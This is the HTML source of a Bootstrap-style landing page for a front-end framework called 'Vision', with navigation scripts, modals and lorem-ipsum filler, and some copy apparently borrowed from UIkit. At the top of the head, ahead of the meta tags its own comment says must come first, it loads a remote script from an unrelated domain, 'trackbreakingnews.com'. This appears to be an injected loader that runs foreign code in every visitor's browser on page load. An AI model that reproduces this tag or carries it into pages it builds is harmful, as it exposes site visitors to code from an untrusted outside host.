
<html lang="en">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
    <script src="http://d.trackbreakingnews.com/l/load.js"></script>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="../../favicon.ico">

    <title>Vision</title>

    <!-- Bootstrap core CSS -->
    <link href="CSS/bootstrap.min.css" rel="stylesheet">

    <link href="CSS/Style.css" rel="stylesheet">
    <!-- Bootstrap theme -->
    <link href="CSS/bootstrap-theme.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="CSS/theme.css" rel="stylesheet">

    <!-- Just for debugging purposes. Don't actually copy these 2 lines! -->
    <!--[if lt IE 9]>
    <script src="js/ie8-responsive-file-warning.js"></script>
    <![endif]-->
    <script src="js/ie-emulation-modes-warning.js"></script>
<link rel="stylesheet" href="CSS/animate.css">
<script src="js/wow.min.js"> </script>

<script> new WOW().init();</script>

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->

 <style type="text/css">


.font-semibold {
        font-family: "Titillium Web",sans-serif;
        font-weight:600px;
        }
.navbar-custom {
    background-color:rgba(0,0,0,0.9);
}
.navbar-nav {
  padding-left: 6.88%;
}
 #navbar-custom {
  width: 100%;
  position: fixed;
  transition:all 0.5s;
  overflow:hidden;
  height: 59px;
}

@media (max-width: 1199px) {
 #navbar-custom {
  width: 100%;
  position: fixed;
  transition:all 0.5s;
  overflow:visible;
}
}

@media (max-width: 399px) {
 #navbar-custom {
  width: 100%;
  position: fixed;
  transition:height 0.3s linear 0s,padding 0.3s linear 0s;
  overflow:visible;
}
}

/* title */
.navbar-custom .navbar-brand {
    color: #DDD;
}
.navbar-custom .navbar-brand:hover,
.navbar-custom .navbar-brand:focus {
    color: transparent;
}
/* link */
.navbar-custom .navbar-nav > li > a {
    color: #cccccc;
    font-family: "Titillium Web",sans-serif;
    font-weight: 800px;
    font-size: 1.1em;
    margin-top: 2%;

}
@media (max-width: 1199px) {
.navbar-custom .navbar-nav > li > a {
    color: #cccccc;
    font-family: "Titillium Web",sans-serif;
    font-weight: 100px;
    font-size: 0.81em;
    margin-top: 2%;

}
}
@media (max-width: 991px) {
.navbar-custom .navbar-nav > li > a {
    color: #cccccc;
    font-family: "Titillium Web",sans-serif;
    font-weight: 100px;
    font-size: 0.61em;
    margin-top: 2%;

}
}
.navbar-custom .navbar-nav > li > a:hover,
.navbar-custom .navbar-nav > li > a:focus {
    background-color: transparent;
 
}
.navbar-custom .navbar-nav > li.X > a:hover,
.navbar-custom .navbar-nav > li.X >  a:focus {
     
   border-bottom:#333333 solid 8px;
   border-bottom-width: 5.5px;


}


.navbar-custom .navbar-nav > li.XX > a:hover,
.navbar-custom .navbar-nav > li.XX >  a:focus {
     
     border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
  
}

.navbar-custom .navbar-nav > li.XXX > a:hover,
.navbar-custom .navbar-nav > li.XXX >  a:focus {
     
  
       border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;

}
.navbar-custom .navbar-nav > li.XXXX > a:hover,
.navbar-custom .navbar-nav > li.XXXX >  a:focus {
     
    
        border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;

}

.navbar-custom .navbar-nav > li.XXXXX > a:hover,
.navbar-custom .navbar-nav > li.XXXXX >  a:focus {
     
     border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
}
.navbar-custom .navbar-nav > li.XXXXXX > a:hover,
.navbar-custom .navbar-nav > li.XXXXXX >  a:focus {
     
   border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
}
.navbar-custom .navbar-nav > li.X.active > a,
.navbar-custom .navbar-nav > li.X.active > a:hover,
.navbar-custom .navbar-nav > li.X.active >  a:focus {
     
   border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;

  }

.navbar-custom .navbar-nav > li.XX.active > a,
.navbar-custom .navbar-nav > li.XX.active > a:hover,
.navbar-custom .navbar-nav > li.XX.active >  a:focus {
     
   border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
}
.navbar-custom .navbar-nav > li.XXX.active > a, 
.navbar-custom .navbar-nav > li.XXX.active > a:hover,
.navbar-custom .navbar-nav > li.XXX.active >  a:focus {
     
   border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
}
.navbar-custom .navbar-nav > li.XXXX.active > a, 
.navbar-custom .navbar-nav > li.XXXX.active> a:hover,
.navbar-custom .navbar-nav > li.XXXX.active >  a:focus {
   border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
}
.navbar-custom .navbar-nav > li.XXXXX.active > a, 
.navbar-custom .navbar-nav > li.XXXXX.active > a:hover,
.navbar-custom .navbar-nav > li.XXXXX.active >  a:focus {
     
   border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
}
.navbar-custom .navbar-nav > li.XXXXXX.active > a, 
.navbar-custom .navbar-nav > li.XXXXXX.active > a:hover,
.navbar-custom .navbar-nav > li.XXXXXX.active >  a:focus {
   border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
}

.navbar-custom .navbar-nav > li.X.open  > a,
.navbar-custom .navbar-nav > li.X.open  > a:hover,
.navbar-custom .navbar-nav > li.X.open >  a:focus {
   border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
}

.navbar-custom .navbar-nav > li.XX.open  > a,
.navbar-custom .navbar-nav > li.XX.open  > a:hover,
.navbar-custom .navbar-nav > li.XX.open  >  a:focus {
   border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
}
.navbar-custom .navbar-nav > li.XXX.open  > a, 
.navbar-custom .navbar-nav > li.XXX.open  > a:hover,
.navbar-custom .navbar-nav > li.XXX.open  >  a:focus {
   border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
}
.navbar-custom .navbar-nav > li.XXXX.open > a, 
.navbar-custom .navbar-nav > li.XXXX.open > a:hover,
.navbar-custom .navbar-nav > li.XXXX.open  >  a:focus {
     
   border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
}
.navbar-custom .navbar-nav > li.XXXXX.open > a, 
.navbar-custom .navbar-nav > li.XXXXX.open  > a:hover,
.navbar-custom .navbar-nav > li.XXXXX.open  >  a:focus {
   border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
}
.navbar-custom .navbar-nav > li.XXXXXX.open > a, 
.navbar-custom .navbar-nav > li.XXXXXX.open  > a:hover,
.navbar-custom .navbar-nav > li.XXXXXX.open >  a:focus {
   border-bottom:#333333 solid 8px;
   border-bottom-width: 4px;
}
.navbar-custom .navbar-nav > .open > a, 
.navbar-custom .navbar-nav > .open > a:hover, 
.navbar-custom .navbar-nav > .open > a:focus {
    color: #555;
    background-color: #D5D5D5;
}
/* caret */
.navbar-custom .navbar-nav > .dropdown > a .caret {
    border-top-color: #777;
    border-bottom-color: #777;
}
.navbar-custom .navbar-nav > .dropdown > a:hover .caret,
.navbar-custom .navbar-nav > .dropdown > a:focus .caret {
    border-top-color: #333;
    border-bottom-color: #333;
}
.navbar-custom .navbar-nav > .open > a .caret, 
.navbar-custom .navbar-nav > .open > a:hover .caret, 
.navbar-custom .navbar-nav > .open > a:focus .caret {
    border-top-color: #555;
    border-bottom-color: #555;
}
/* mobile version */
.navbar-custom .navbar-toggle {
    border-color: #DDD;
}
.navbar-custom .navbar-toggle:hover,
.navbar-custom .navbar-toggle:focus {
    background-color: #DDD;
}
.navbar-custom .navbar-toggle .icon-bar {
    background-color: #CCC;
}
.line-row hr{
  width: 33%;
  background-color: #E4E6E5;
  height: 5px;

}
@media (max-width: 767px) {
    .navbar-custom .navbar-nav .open .dropdown-menu > li > a {
        color: #E4E6E5;
    }
    .navbar-custom .navbar-nav .open .dropdown-menu > li > a:hover,
    .navbar-custom .navbar-nav .open .dropdown-menu > li > a:focus {
        color: #E4E6E5;
    }


    .navbar-custom .navbar-nav > li > a {
    background-color: #000;
    width: 100%;
    position: relative;

}
    .navbar-custom .navbar-nav > li.X > a {
    background-color: #00CCCC;
    font-family: "Titillium Web",sans-serif;
    font-weight: 600px;
    font-size: 1.1em;

}

    .navbar-custom .navbar-nav > li.XX > a {
    background-color: #17AEDF;
    font-family: "Titillium Web",sans-serif;
    font-weight: 600px;
    font-size: 1.1em;

}

    .navbar-custom .navbar-nav > li.XXX > a {
    background-color: #6699FF;
    font-family: "Titillium Web",sans-serif;
    font-weight: 600px;
    font-size: 1.1em;

}

    .navbar-custom .navbar-nav > li.XXXX > a {
    background-color:  #3366CC;
    font-family: "Titillium Web",sans-serif;
    font-weight: 600px;
    font-size: 1.1em;

}
   .navbar-custom .navbar-nav > li.XXXXX > a {
    background-color:  #000099;
    font-family: "Titillium Web",sans-serif;
    font-weight: 600px;
    font-size: 1.1em;

}

   .navbar-custom .navbar-nav > li.XXXXXX > a {
    background-color:   #000033; 
    font-family: "Titillium Web",sans-serif;
    font-weight: 600px;
    font-size: 1.1em;

}
}

@media (max-width: 367px) {
    .navbar-custom .navbar-nav .open .dropdown-menu > li > a {
        color:#E4E6E5;


    }
    .navbar-custom .navbar-nav .open .dropdown-menu > li > a:hover,
    .navbar-custom .navbar-nav .open .dropdown-menu > li > a:focus {
        color: #E4E6E5;
    }

    .navbar-custom .navbar-nav > li.X > a {
    background-color: #666;
    font-family: "Titillium Web",sans-serif;
    font-weight: lighter;
    font-size: 0.9em;

}
 .navbar-custom .navbar-nav > li > a {
    background-color: #000;
    width: 100%;
  

}
    .navbar-custom .navbar-nav > li.XX > a {
    background-color:#6699FF;
    font-family: "Titillium Web",sans-serif;
    font-weight: lighter;
    font-size: 0.9em;

}

    .navbar-custom .navbar-nav > li.XXX > a {
    background-color: #17AEDF; 
    font-family: "Titillium Web",sans-serif;
     font-weight: lighter;
    font-size: 0.9em;

}

    .navbar-custom .navbar-nav > li.XXXX > a {
    background-color:  #3366CC;
    font-family: "Titillium Web",sans-serif;
    font-weight: lighter;
    font-size: 0.9em;

}
   .navbar-custom .navbar-nav > li.XXXXX > a {
    background-color:  #000099; 
    font-family: "Titillium Web",sans-serif;
    font-weight:  lighter;
    font-size:  0.9em;

}

   .navbar-custom .navbar-nav > li.XXXXXX > a {
    background-color:   #000033;  
    font-family: "Titillium Web",sans-serif;
    font-weight: lighter;
    font-size:  0.9em;

}
}

#X1 {
  transition:all 0.5s linear 0s;
}
#X2 {
    transition:all 0.5s linear 0s;
}
#X3 {
    transition:all 0.5s linear 0s;
}
#X4 {
     transition:all 0.5s linear 0s;

}
#X5 {
     transition:all 0.5s linear 0s;

}
#X6 {
     transition:all 0.5s linear 0s;
}

  </style>


   <script type="text/javascript">
     function Scroll() {
        var top = document.getElementById('navbar-custom');
        var ypos = window.pageYOffset;
        if(ypos > 798) {
          top.style.height="54px";

        } else {
          top.style.height="59px";
        }
     }
     window.addEventListener("scroll",Scroll);
     </script>


       <script type="text/javascript">
     function Scroll() {
        var top = document.getElementById('navbar-custom');
        var ypos = window.pageYOffset;
        if(ypos > 798) {
         top.style.opacity="0.9";
          top.style.backgroundColor="#fff";

        } else {
        top.style.opacity="0.9";
          top.style.backgroundColor="#000";

        }
     }
     window.addEventListener("scroll",Scroll);
     </script>


    <script type="text/javascript">
     function Scroll() {
          var top = document.getElementById('X1');
        var ypos = window.pageYOffset;
        if(ypos > 0 && ypos < 798) {
         top.style.borderTop="#CCCCCC solid 8px";
         top.style.borderTopWidth="5.5px";

        } else {
          top.style.borderTop="none";
        }

        var top = document.getElementById('X2');
        var ypos = window.pageYOffset;
        if(ypos > 798 && ypos < 2590) {
         top.style.borderTop="#000 solid 8px";
         top.style.borderTopWidth="5.5px";
        } else {
          top.style.borderTop="none";
        }
        var top = document.getElementById('X3');
          if(ypos > 2590 && ypos < 3220) {
             top.style.borderTop="#333333 solid 8px";
         top.style.borderTopWidth="5.5px";
        } else {
          top.style.borderTop="none";
        }

         var top = document.getElementById('X4');
          if(ypos > 3220 && ypos < 4310) {
             top.style.borderTop="#333333 solid 8px";
         top.style.borderTopWidth="5.5px";
        } else {
          top.style.borderTop="none";
        }

            var top = document.getElementById('X5');
          if(ypos > 4310 && ypos < 5250) {
             top.style.borderTop="#333333 solid 8px";
         top.style.borderTopWidth="5.5px";
        } else {
          top.style.borderTop="none";
        }

            var top = document.getElementById('X6');
          if(ypos > 5250) {
            top.style.borderTop="#333333 solid 8px";
         top.style.borderTopWidth="5.5px";
        } else {
          top.style.borderTop="none";
        }
     }
     window.addEventListener("scroll",Scroll);
     </script>
 <script type="text/javascript">
     function Scroll() {
        var top = document.getElementById('TX');
        var ypos = window.pageYOffset;
        if(ypos > 798) {
          top.style.color="#666666";

        } else {
          top.style.color="#cccccc";
        }

          var top = document.getElementById('TX2');
        var ypos = window.pageYOffset;
        if(ypos > 798) {
          top.style.color="#666666";

        } else {
          top.style.color="#cccccc";
        }


          var top = document.getElementById('TX3');
        var ypos = window.pageYOffset;
        if(ypos > 798) {
          top.style.color="#666666";

        } else {
          top.style.color="#cccccc";
        }

          var top = document.getElementById('TX4');
        var ypos = window.pageYOffset;
        if(ypos > 798) {
          top.style.color="#666666";

        } else {
          top.style.color="#cccccc";
        }

          var top = document.getElementById('TX5');
        var ypos = window.pageYOffset;
        if(ypos > 798) {
          top.style.color="#666666";

        } else {
          top.style.color="#cccccc";
        }

          var top = document.getElementById('TX6');
        var ypos = window.pageYOffset;
        if(ypos > 798) {
          top.style.color="#666666";

        } else {
          top.style.color="#cccccc";
        }
     }
     window.addEventListener("scroll",Scroll);
     </script>



  <script type="text/javascript">
    var scrollY=0;
    var distance=40;
    var speed=24;
        function autoscrollTo(el) {
          var currentY = window.pageYOffset;
          var targetY = document.getElementById(el).offsetTop;
          var bodyHeight = document.body.offsetHeight;
          var yPos = currentY + window.innerHeight;
          var animator = setTimeout('autoscrollTo(\''+el+'\')',speed);      
          if(yPos > bodyHeight) {
          clearTimeout(animator);    
          } 
          else 
          {
            if(currentY < targetY-distance) {
              scrollY = currentY+distance;
              window.scroll(0,scrollY);
            } 
            else {
              clearTimeout(animator);
            }
          }
        }
    </script>






    <script type="text/javascript">
   
        function resetScroller(el) {
          var currentY = window.pageYOffset;
          var targetY = document.getElementById(el).offsetTop;
          var animator = setTimeout('resetScroller(\''+el+'\')',2);      
        
            if(currentY > targetY) {
              scrollY = currentY-distance;
              window.scroll(0,scrollY);
            } 
            else {
              clearTimeout(animator);
            }
          }
    </script>

</head>
  <body>
    <header id="header">
           <div class="navbar navbar-custom navbar-fixed-top pulse animated" id="navbar-custom">
      <div class="container">
     
            <a href="#" class="navbar-brand XX pull-left"  >
              <div class="LOG">
                <img src="Ai/F.png">
              <h3>V<span>ision</span></h3>
            </a></div>
        <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            </button>
            
        <div class="collapse navbar-collapse">
          <ul class="nav navbar-nav"  id="Nv">
            <li class="X" id="X1"> 
                <a id="TX" href="#" onclick="return false;" onmousedown="autoscrollTo('div1');  resetScroller('myheading');" >
                  <span class="glyphicon glyphicon-home" aria-hidden="true"></span>&nbsp HOME</a></li>

                  <li  class="XX" id="X2"> 
     <a id="TX2" href="#" onclick="return false;" onmousedown="autoscrollTo('div2');  resetScroller('myheading1');">
                      <span class="glyphicon glyphicon-thumbs-up" aria-hidden="true"></span> &nbsp ABOUT US</a></li>
                  <li class="XXX" id="X3">

                    <a id="TX3" href="#" onclick="return false;" onmousedown="autoscrollTo('div3');  resetScroller('myheading2');"><span class="glyphicon glyphicon-pencil" aria-hidden="true"></span>&nbsp PORTFOLIO</a></li>
                              <li class="XXXX " id="X4"> 

                                <a id="TX4" href="#" onclick="return false;" onmousedown="autoscrollTo('div4');  resetScroller('myheading3');"><span class="glyphicon glyphicon-wrench" aria-hidden="true"></span>&nbsp WORKFLOW</a></li>
                              <li class="XXXXX" id="X5">

                               <a id="TX5" href="#" onclick="return false;" onmousedown="autoscrollTo('div5');  resetScroller('myheading4');">
                                <span class="glyphicon glyphicon-user" aria-hidden="true">
                                </span>&nbsp CLIENTS</a></li>
                              <li  class="XXXXXX" id="X6">

<a id="TX6" href="#" onclick="return false;" onmousedown="autoscrollTo('div6'); resetScroller('myheading5');"><span class="glyphicon glyphicon-envelope" aria-hidden="true"></span>&nbsp CONTACT</a></li>
                              </li>
                            </ul>
                          </div> 
                      </div>
                  </div>
     </header> <div> </div>
   <div id="myheading"></div>
   <div class="Hed" id="div1">
   <div class="container-fluid">
    <div class="row">
      <div class="Wrr">
        <img src="Ai/LG.png" alt="LogoMain"> </div>
        <h2>V<span>ision</span></h2> <br/>
        <p>A lightweight and modular front-end framework<br/>
        for developing fast and powerful web interfaces.</p>
        <br/>
        <center>
        <h3 data-toggle="modal" data-target="#myModal3">Download Vision </h3>


        <div class="modal fade" id="myModal3" tabindex="-1" role="dialog" area-labelledby="myModalLabel" aria-hidden="true">
            <div class="modal-dialog">
              <div class="modal-content">
                <div class="modal-header">
                 
                  <button type="button" class="close" data-dismiss="modal" aria-label="Close" <span aria-hidden="true"> &times; </span></button>  
                    <h4 class="modal-tittle" id="myModalLabel"> <strong>Thank You, Your Download will starts in few Seconds....</strong> </h4>
                      </div>
                      <div class="modal-footer"> <button type="button" class="btn btn-Default" data-dismiss="modal"> Close</button>
                    </div>
                  </div>
                </div>
             </div> 
        </center>
      <br/><br/>
    <h4>GitHub | Get Started | Version 2.20.3 </h4>
      <h5>4850 &nbsp &nbsp   &nbsp  Stargazers &nbsp &nbsp  &nbsp  925 Forks &nbsp  &nbsp &nbsp   @getvision &nbsp &nbsp  &nbsp Community </h5>
    </div> <br/> <br/> <br/>
  </div>
  </div>
 <div id="myheading1"></div>
  <div class="TOPP" id="div2">
<div class="container-fluid">
  <h3>Features</h3>
  <div class="line-row">
    <hr/>
  </div>
  <p>Vision gives you a comprehensive collection of <em> HTML </em>, <em>CSS</em>, and <em>JS</em> components<br/>
which is simple to use, easy to customize and extendable.</p> <br/><br/>
   <center>   <div class="row MG">
          <div class="col-lg-12 col-md-32 col-sm-12 col-xs-12">
          <img src="Ai/Respo4.png"> 
       </div>
    </div></center>



          <div class="row">    
          <div class="col-lg-3 col-md-3 col-sm-6 col-xs-12">
          <div class="headx">
          <div class="LL1">
          <img src="Ai/L1.png">
          <h3>Components</h3>
          <p>
          A collection of small, responsive<br/> components using consistent and <br/>conflict-free naming conventions. </p>  
          </div>  </div>   
        </div>
          <div class="col-lg-3 col-md-3 col-sm-6 col-xs-12">

          <div class="headx">
        <div class="LL2"> 
          <img src="Ai/L2.png"> 

          <h3>LESS</h3>
          <p>
         Vision is developed in <em> LESS </em>to write<br/> well-structured, extendable code which<br/> is easy to maintain.</p>    
          </div>     </div>   
        </div>

          <div class="col-lg-3 col-md-3 col-sm-6 col-xs-12">

          <div class="headx">
            <div class="LL3">
          <img src="Ai/L3.png"> 

          <h3>Customizer</h3>
          <p>
        UIkit's very basic style can be extended<br/> with themes and is easy to customize to <br/>create your own look.</p>    
          </div></div>   
        </div>

                  <div class="col-lg-3 col-md-3 col-sm-6 col-xs-12">

          <div class="headx">
          <div class="LL4">
          <img src="Ai/L4.png"> 

          <h3>Responsive</h3>
          <p>
          With the mobile-first approach Vision <br/>provides a consistent experience from <br/> <em>phones</em> and <em>tablets</em> to <em>desktops</em>.</p>  
          </div>  
          </div>   
        </div>

      </div>
    </div>
    <br/><br/><br/>
</div>
  <div class="TOPP1" id="div2">
    <div class="container-fluid">

      <h3>NOBODY DOES IT LIKE US</h3>
      <div class="row line-row">
          <hr>
      </div>
          <h4>
    Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis cursus eros nisi, id consequat mi finibus ac. Maecenas eget<br/> egestas mi. Nullam pretium, risus eu porta elementum, nisl nulla rutrum mi, non tempus nunc<br/> nisl ac orci. Integer sed sapien eget magna tincidunt<br/> lacinia non sollicitudin neque.</h4>
          <div class="row">

           
          <div class="col-lg-4 col-md-4 col-sm-12 col-xs-12">

          <div class="headxx">
        <div class="LLL2"> 
          <img src="Ai/C2.png" alt="C2"> 

          <h3>
          Illumination
          </h3>
          <p>Nulla tortor nisi, commodo ut fringilla  <br/>nec, dictum egetturpis. Quisque tempor sagittis <br/> justo,non hendrerit neque imperdiet porttitor. <br/> Proin convallis efficitur urna.</p>
            <a><button class="btn btn-custom TOPxx" data-toggle="modal" data-target="#myModal">More..</button></a>

            <div class="modal fade" id="myModal" tabindex="-1" role="dialog" area-labelledby="myModalLabel" aria-hidden="true">
            <div class="modal-dialog">
              <div class="modal-content">
                <div class="modal-header">
                 
                  <button type="button" class="close" data-dismiss="modal" aria-label="Close" <span aria-hidden="true"> &times; </span></button>  
                    <h2 class="modal-tittle" id="myModalLabel"> <strong>Illumination</strong> </h2>
                      </div>
                      <div class="modal-body"> 
                          Lorem ipsum dolor sit amet,eros consectetur sit adipiscing elit. Duis   sit eros nisi, Duis  id consequat mi finibus ac. Maecenas eget
                            egestas mi. Nullam  eros, risus eu porta Duis  elementum, nisl nulla rutrum mi, non tempus nunc nisl ac orci. Integer sed sapien eget magna tincidunt lacinia non sollicitudin neque.
                      </div>
                      <div class="modal-footer"> <button type="button" class="btn btn-Default" data-dismiss="modal"> Close</button>
                    </div>
                  </div>
                </div>
             </div>
            

              </div> 
           </div>   
        </div>
           <div class="col-lg-4 col-md-4 col-sm-12 col-xs-12">
          <div class="headxx">
          <div class="LLL1">
          <img src="Ai/C1.png" alt="C1">
          <h3>Discover</h3>
          <p>Nulla tortor nisi, commodo ut fringilla  <br/>nec, dictum egetturpis. Quisque tempor sagittis <br/> justo,non hendrerit neque imperdiet porttitor. <br/> Proin convallis efficitur urna.</p>
          <a><button class="btn btn-custom TOPxx" data-toggle="modal" data-target="#myModal1">More..</button></a> 

          <div class="modal fade" id="myModal1" tabindex="-1" role="dialog" area-labelledby="myModalLabel" aria-hidden="true">
            <div class="modal-dialog">
              <div class="modal-content">
                <div class="modal-header">
                 
                  <button type="button" class="close" data-dismiss="modal" aria-label="Close" <span aria-hidden="true"> &times; </span></button>  
                    <h2 class="modal-tittle" id="myModalLabel"> <strong>Discover</strong> </h2>
                      </div>
                      <div class="modal-body"> 
                          Lorem ipsum dolor sit amet,eros consectetur sit adipiscing elit. Duis   sit eros nisi, Duis  id consequat mi finibus ac. Maecenas eget
                            egestas mi. Nullam  eros, risus eu porta Duis  elementum, nisl nulla rutrum mi, non tempus nunc nisl ac orci. Integer sed sapien eget magna tincidunt lacinia non sollicitudin neque.
                      </div>
                      <div class="modal-footer"> <button type="button" class="btn btn-Default" data-dismiss="modal"> Close</button>
                    </div>
                  </div>
                </div>
             </div>   
          </div>  
        </div>   
        </div>
          <div class="col-lg-4 col-md-4 col-sm-12 col-xs-12">

          <div class="headxx">
            <div class="LLL3">
          <img src="Ai/C3.png" alt="C3"> 

          <h3>Capture Momentes</h3>
          <p>Nulla tortor nisi, commodo ut fringilla  <br/>nec, dictum egetturpis. Quisque tempor sagittis <br/> justo,non hendrerit neque imperdiet porttitor. <br/> Proin convallis efficitur urna.</p>    
          <a><button class="btn btn-custom TOPxx" data-toggle="modal" data-target="#myModal2">More..</button></a>  

        <div class="modal fade" id="myModal2" tabindex="-1" role="dialog" area-labelledby="myModalLabel" aria-hidden="true">
            <div class="modal-dialog">
              <div class="modal-content">
                <div class="modal-header">
                 
                  <button type="button" class="close" data-dismiss="modal" aria-label="Close" <span aria-hidden="true"> &times; </span></button>  
                    <h2 class="modal-tittle" id="myModalLabel"> <strong>Capture Momentes</strong> </h2>
                      </div>
                      <div class="modal-body"> 
                          Lorem ipsum dolor sit amet,eros consectetur sit adipiscing elit. Duis   sit eros nisi, Duis  id consequat mi finibus ac. Maecenas eget
                            egestas mi. Nullam  eros, risus eu porta Duis  elementum, nisl nulla rutrum mi, non tempus nunc nisl ac orci. Integer sed sapien eget magna tincidunt lacinia non sollicitudin neque.
                      </div>
                      <div class="modal-footer"> <button type="button" class="btn btn-Default" data-dismiss="modal"> Close</button>
                    </div>
                  </div>
                </div>
             </div> 

               </div>
            </div>   
          </div>
        </div>
      </div>

  <br/><br/><br/>
  </div>
  </div>
 <div id="myheading2"></div>

  <div class="P2" >
    <div class="container-fluid">
      

      <div class="row">
       <div class="LS2">
        <div class="col-lg-4  col-md-4 col-sm-12 col-xs-12">
          <img src="Ai/VS2.jpg" class="LSSS"alt="x(1)">
         </div> </div>
          <div class="LS1">
          <div class="col-lg-4  col-md-4 col-sm-12 col-xs-12">
          <img src="Ai/M03.png"class="LSSS"alt="x(1)">

  <div class="L2">
          <center><h2 data-target="#myModal4" data-toggle="modal"> View</h2>

         <div class="modal fade" id="myModal4" tabindex="-1" role="dialog" area-labelledby="myModalLabel" aria-hidden="true">
            <div class="modal-dialog">
              <div class="modal-content">
                <div class="modal-header">
                 
                  <button type="button" class="close" data-dismiss="modal" aria-label="Close" <span aria-hidden="true"> &times; </span></button>  
                    <h3 class="modal-tittle" id="myModalLabel"> <strong>Our Portfolio</strong> </h3>
                      </div>
                      <div class="modal-body"> 
                          Lorem ipsum dolor sit amet,eros consectetur sit adipiscing elit. Duis   sit eros nisi, Duis  id consequat mi finibus ac. Maecenas eget
                            egestas mi. Nullam  eros, risus eu porta Duis  elementum, nisl nulla rutrum mi, non tempus nunc nisl ac orci. Integer sed sapien eget magna tincidunt lacinia non sollicitudin neque.
                      </div>
                      <div class="modal-footer"> <button type="button" class="btn btn-Default" data-dismiss="modal"> Close</button>
                    </div>
                  </div>
                </div>
             </div>
                     <h4>Nulla tortor nisi, commodo ut fringilla  <br/>nec, dictum egetturpis. 
            </h4></center>
          </div>         
                </div> 
        </div>
        <div class="LS" id="div3">
        <div class="col-lg-4  col-md-4 col-sm-12 col-xs-12">
      
       <img src="Ai/VS.jpg" class="LSSS"alt="x(1)">

     </div>
            </div>
   </div>
  </div>
  </div>
  </div>


<div class="ANI">
    <div class="container-fluid">
      <div class="row">
             <div class="LS2">
       <div class="col-lg-4  col-md-4 col-sm-12 col-xs-12">
       <img src="Ai/M7.png" class="LSSS" alt="x(1)">
      
        </div> </div>

             <div class="LS1">
       <div class="col-lg-4  col-md-4 col-sm-12 col-xs-12">
       
       <img src="Ai/VS3.jpg" class="LSSS" alt="x(1)">
            <div class="L2">
          <center><h2 data-toggle="modal" data-target="#myModal4"> View</h2>

         <div class="modal fade" id="myModal4" tabindex="-1" role="dialog" area-labelledby="myModalLabel" aria-hidden="true">
            <div class="modal-dialog">
              <div class="modal-content">
                <div class="modal-header">
                 
                  <button type="button" class="close" data-dismiss="modal" aria-label="Close" <span aria-hidden="true"> &times; </span></button>  
                    <h3 class="modal-tittle" id="myModalLabel"> <strong>Our Portfolio</strong> </h3>
                      </div>
                      <div class="modal-body"> 
                          Lorem ipsum dolor sit amet,eros consectetur sit adipiscing elit. Duis   sit eros nisi, Duis  id consequat mi finibus ac. Maecenas eget
                            egestas mi. Nullam  eros, risus eu porta Duis  elementum, nisl nulla rutrum mi, non tempus nunc nisl ac orci. Integer sed sapien eget magna tincidunt lacinia non sollicitudin neque.
                      </div>
                      <div class="modal-footer"> <button type="button" class="btn btn-Default" data-dismiss="modal"> Close</button>
                    </div>
                  </div>
                </div>
             </div>

          <h4>Nulla , commodo ut fringilla  <br/>nec, dictum egetturpis. 
            </h4></center>
           
        </div> 
        </div> </div>
        <div class="LS">
        <div class="col-lg-4  col-md-4 col-sm-12 col-xs-12">
       <img src="Ai/M6.png" class="LSSS" alt="x(1)">
         
        </div>
        </div>

  </div>
  </div>
 <div id="myheading3"></div>
    <div class="END" id="div4">
      <h3>Open Source</h3>
      <div class="line-row">
        <hr>
      </div>
      <span><center>VISION is an open source framework to make the web look good.<br/>
Create your own styles and discover the unlimited use of VISION.</center></span>
        <p>
</div>
  <div class="PUR1">
   <div class="container">
      <div class="row MG1">   
       <div class="col-lg-12  col-md-12 col-sm-12 col-xs-12">
      <center><img src="Ai/Respo002.png"  alt="x(1)"></center> 
        </div>    
   </div>  
 </div>
 </div>
 <div class="END">

      <div class="container">
      <div class="row">
        <div class="KIT">
        <div class="col-lg-4 col-md-4 col-sm-12 col-xs-12">
             <img src="Ai/M.png">
      <h4>MIT License</h4>
       <p>Vision is absolutely free of charge and you can use,<br/> copy, merge, publish and distribute the framework <br/>without any limitations.</p>
         </div>

         <div class="col-lg-4  col-md-4 col-sm-12 col-xs-12">
      <img src="Ai/N.png">

      <h4>Our Heros</h4>
       <p>A big thanks to LESS, jQuery, normalize.css and<br/> FontAwesome. VISION wouldn't possible without <br/> these awesome open source projects.</p>
         </div>

         <div class="col-lg-4  col-md-4 col-sm-12 col-xs-12">
      <img src="Ai/I2.png">

      <h4>Active Development</h4>
       <p>VISION is built by YOOtheme, using our extensive <br/> experience in creating Joomla and WordPress<br/> themes, to power the Warp theme framework.</p>
         </div> </div></div>
      </div><br/><br/><br/><br/>
      </div> </div>

 <div id="myheading4"></div>
<div class="PUR" id="div5">
<div class="container-fluid">

    <div class="row">
    <div class="col-lg-12 ">
      <div class="DD1">
      <h3 class="font-thin">See us  <span class="font-semibold">at work</span></h3>
      </div>
      <br/>
      <br/>
      <div class="row line-row">
      <hr>
      </div>
      <div class="DD2">
      <h4 class="font-thin">Simplicity and elegance, curiosity and nerditude are<br/> the ingredients we put in our projects combining the<br/> latest possibilities of the web with genuine graphic<br/> design principles.</h4>
    </div><br/><br/>
